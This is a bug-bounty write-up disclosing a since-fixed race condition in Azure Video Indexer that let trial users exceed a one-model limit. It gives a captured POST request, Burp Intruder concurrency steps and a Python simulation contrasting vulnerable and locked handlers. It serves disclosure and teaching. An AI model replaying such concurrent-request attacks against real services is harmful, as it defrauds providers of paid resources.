Race condition vulnerability in Azure Video Indexer allowed trial account users to use an Advanced / Premium feature

VULNERABILITY DESCRIPTION

Microsoft's Azure Video Indexer service (https://vi.microsoft.com/en-us) has a feature called "Animated Characters", located in the "Model customizations" tab. It lets Video Indexer customers add character models, which are used to identify and group animated characters when content is uploaded.

Per the business logic of Azure Video Indexer, a trial account is allowed only one such model, as stated on the "Animated characters (preview)" tab itself.

During the research, the endpoint that adds a model initially appeared to work as expected: the one-model limit was validated on both the client and the server side.
Further testing of the same endpoint revealed a race condition that allows a trial user to add N animated-character models to a trial account, bypassing the business logic that restricts trial users from consuming premium features and resources, and so using them for free.

RISK BREAKDOWN

  • Risk: High / Important

  • Difficulty to Exploit: Medium

AFFECTED URLS

https://api.videoindexer.ai/trial/accounts/$ACCOUNT_ID/Customization/AnimationModels?accesstoken=

STEPS TO REPRODUCE

Step 1. Log in to Videoindexer.ai using any trial account (e.g. vikzsharma@twitter.com).

Step 2. Navigate to the left tab Model customizations -> Animated Characters.

Step 3. Observe that the tab explicitly states "You can add one model on a trial account".

Step 4. Add a model to the account and observe that the one-model limit for trial accounts is enforced on both the client and the server side: a second model is rejected.

Step 5. Start fresh: delete the existing model from the trial account, then navigate to Model customizations -> Animated Characters again and click Add Model.

Step 6. Enable a proxy tool (e.g. Burp Suite or mitmproxy) in the browser, enter a model name and intercept the POST request (shown below). Send it to Burp Intruder and then drop the intercepted request so the browser's own copy is never sent.
```
POST /trial/accounts/0c2d9f08-b2d9-4b71-9c4a-1e9d32a70a6a/Customization/AnimationModels HTTP/1.1
Host: api.videoindexer.ai
Content-Length: 27
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="102", "Google Chrome";v="102"
X-Ms-Client-Session-Id: sc9sx7oP0cFv/1o9ffkcUk
Sec-Ch-Ua-Mobile: ?0
Content-Type: application/json
Accept: application/json, text/plain, */*
X-Ms-Client-Request-Id: 49314542-bec2-3930-3a83-5f5667789332
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://www.videoindexer.ai
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.videoindexer.ai/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"name":"Imfirstmodel"}
```

Step 7. In Burp Intruder, set the maximum concurrent requests to 300, 500 or 600 and mark the value of the "name" parameter ("Imfirstmodel" in this example, i.e. §Imfirstmodel§) as the payload position. Any payload type, numeric or alphanumeric, will do, as long as each request carries a distinct name.

For testing purposes, send 500-1000 numeric or alphanumeric names concurrently.

Step 8. Observe the result. The most likely cause is that the server performs the "fewer than one model" check and the insert as two separate, non-atomic steps, so requests that arrive within the same window all pass the check before any of them has been committed. This is a classic check-then-act (TOCTOU) race condition; it bypasses the authorization / business-logic control in place and allows N models to be added to a trial account.

Intruder shows many 201 responses, proving that N models were created in a trial account, bypassing the critical business logic that restricts trial users of Azure Video Indexer.
- Trial account with many models (screenshot):
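To show why Steps 6-8 work, and what the server-side fix looks like, here is an added example that is not part of the original write-up and does not touch the real api.videoindexer.ai endpoint. It is a constructed, in-process stand-in for the AnimationModels handler: `VulnerableModelStore` does the limit check and the insert as two separate steps (the pattern the race exploits), `SafeModelStore` does them under one lock, and `race()` replays what Burp Intruder did by firing many concurrent "POSTs" with distinct model names. The class and function names, the 5 ms simulated database round-trip and the 201/409 status codes are assumptions made for the example.

```python
import threading
import time
from concurrent.futures import ThreadPoolExecutor

# Business rule from the Video Indexer UI: one animated-character model per trial account.
TRIAL_MODEL_LIMIT = 1
CREATED, LIMIT_REACHED = 201, 409  # assumed status codes for the example


class VulnerableModelStore:
    """Constructed stand-in for the vulnerable server-side handler.
    The limit check and the insert are two separate steps with nothing making
    them atomic, so concurrent requests can all observe 'no models yet' before
    any of them has inserted (check-then-act / TOCTOU race)."""

    def __init__(self):
        self.models = []

    def add_model(self, name):
        if len(self.models) >= TRIAL_MODEL_LIMIT:  # check ...
            return LIMIT_REACHED
        time.sleep(0.005)  # simulated DB round-trip between check and insert (assumed)
        self.models.append(name)                   # ... then act
        return CREATED


class SafeModelStore:
    """Same rule, but check and insert run under a single lock, so no request can
    slip between another request's check and its insert. In a real service the
    equivalent is a transaction with a uniqueness/count constraint or an atomic
    conditional insert rather than an in-memory lock."""

    def __init__(self):
        self.models = []
        self._lock = threading.Lock()

    def add_model(self, name):
        with self._lock:
            if len(self.models) >= TRIAL_MODEL_LIMIT:
                return LIMIT_REACHED
            time.sleep(0.005)
            self.models.append(name)
            return CREATED


def race(store, requests=200, concurrency=50):
    """Replay the Intruder attack: fire `requests` POSTs for distinct model names,
    `concurrency` at a time, and count how many were accepted.
    Returns (number_of_201_responses, models_actually_stored)."""
    gate = threading.Barrier(concurrency)

    def send(i):
        try:
            gate.wait(timeout=1)  # line up each batch so it hits the window together
        except threading.BrokenBarrierError:
            pass  # a broken barrier only means the batch was not aligned; still send
        return store.add_model(f"model-{i}")

    with ThreadPoolExecutor(max_workers=concurrency) as pool:
        statuses = list(pool.map(send, range(requests)))
    return statuses.count(CREATED), len(store.models)


if __name__ == "__main__":
    for cls in (VulnerableModelStore, SafeModelStore):
        accepted, stored = race(cls())
        print(f"{cls.__name__}: {accepted} x 201, {stored} model(s) in the trial account")
```

Running the block prints dozens of 201s and a multi-model account for the vulnerable store, and exactly one 201 with one stored model for the locked store. The attacker-side takeaway is that sequential requests prove nothing about a limit; the defender-side takeaway is that a limit check must be atomic with the write it guards.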

IMPACT

1. This race condition allowed an attacker to add N models to a free trial account, a capability the documentation describes as a paid feature of Azure (https://docs.microsoft.com/en-us/azure/azure-video-indexer/animated-characters-recognition#limitations).
2. Financial loss from premium resources consumed for free, as well as reputational loss.

TIMELINES 

  • Jun 18, 2022 - Case opened
  • Aug 22, 2022 - Issue confirmed -> changed to Develop status
  • September 2022 - Fix / HOF (Hall of Fame)

 Follow me @vikzsharma on Twitter for updates on write ups.
